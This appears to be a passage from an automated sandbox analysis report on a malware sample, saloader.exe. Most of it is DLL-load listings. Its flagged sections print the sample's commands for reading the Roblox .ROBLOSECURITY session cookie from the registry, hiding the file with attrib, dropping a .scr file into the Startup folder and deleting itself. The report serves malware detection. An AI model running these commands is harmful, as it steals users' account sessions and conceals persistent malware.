                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                        Source: C:\Users\user\Desktop\saloader.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{62BE5D10-60EB-11d0-BD3B-00A0C911CE86}\InprocServer32Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                        Source: saloader.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: saloader.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: saloader.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

                        Data Obfuscation

                        barindex
                        Suspicious powershell command line found
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITYJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIERJump to behavior
                        Source: saloader.exeStatic PE information: 0x9C61056C [Wed Feb 19 18:54:36 2053 UTC]
                        Source: C:\Users\user\Desktop\saloader.exeCode function: 0_2_00007FFAAC6294D5 push edi; ret 0_2_00007FFAAC6294D6
                        Source: C:\Users\user\Desktop\saloader.exeCode function: 0_2_00007FFAAC6320A1 push esi; retf 0_2_00007FFAAC6320A7
                        Source: C:\Users\user\Desktop\saloader.exeCode function: 0_2_00007FFAAC7E4C62 push ebx; retf 0_2_00007FFAAC7E59DA
                        Source: C:\Users\user\Desktop\saloader.exeCode function: 0_2_00007FFAAC7D7963 push ebx; retf 0_2_00007FFAAC7D796A
                        Source: C:\Users\user\Desktop\saloader.exeCode function: 0_2_00007FFAAC7E58E8 push ebx; retf 0_2_00007FFAAC7E59DA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFAAC50D2A5 pushad ; iretd 9_2_00007FFAAC50D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFAAC6285FA push ebx; ret 9_2_00007FFAAC62868A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFAAC62868D push ebx; ret 9_2_00007FFAAC6286EA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFAAC6300BD pushad ; iretd 14_2_00007FFAAC6300C1

                        Persistence and Installation Behavior

                        barindex
                        Drops PE files with a suspicious file extension
                        Source: C:\Users\user\Desktop\saloader.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FRc7Z.scrJump to dropped file
                        Uses attrib.exe to hide files
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\saloader.exe"
                        Source: C:\Users\user\Desktop\saloader.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FRc7Z.scrJump to dropped file
                        Source: C:\Users\user\Desktop\saloader.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FRc7Z.scrJump to dropped file

                        Boot Survival

                        barindex
                        Drops PE files to the startup folder
                        Source: C:\Users\user\Desktop\saloader.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FRc7Z.scrJump to dropped file
                        Source: C:\Users\user\Desktop\saloader.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\FRc7Z.scrJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\FRc7Z.scrJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FRc7Z.scr\:Zone.Identifier:$DATAJump to behavior

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Loading BitLocker PowerShell Module
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Self deletion via cmd or bat file
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\saloader.exe" && pause
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\saloader.exe" && pauseJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
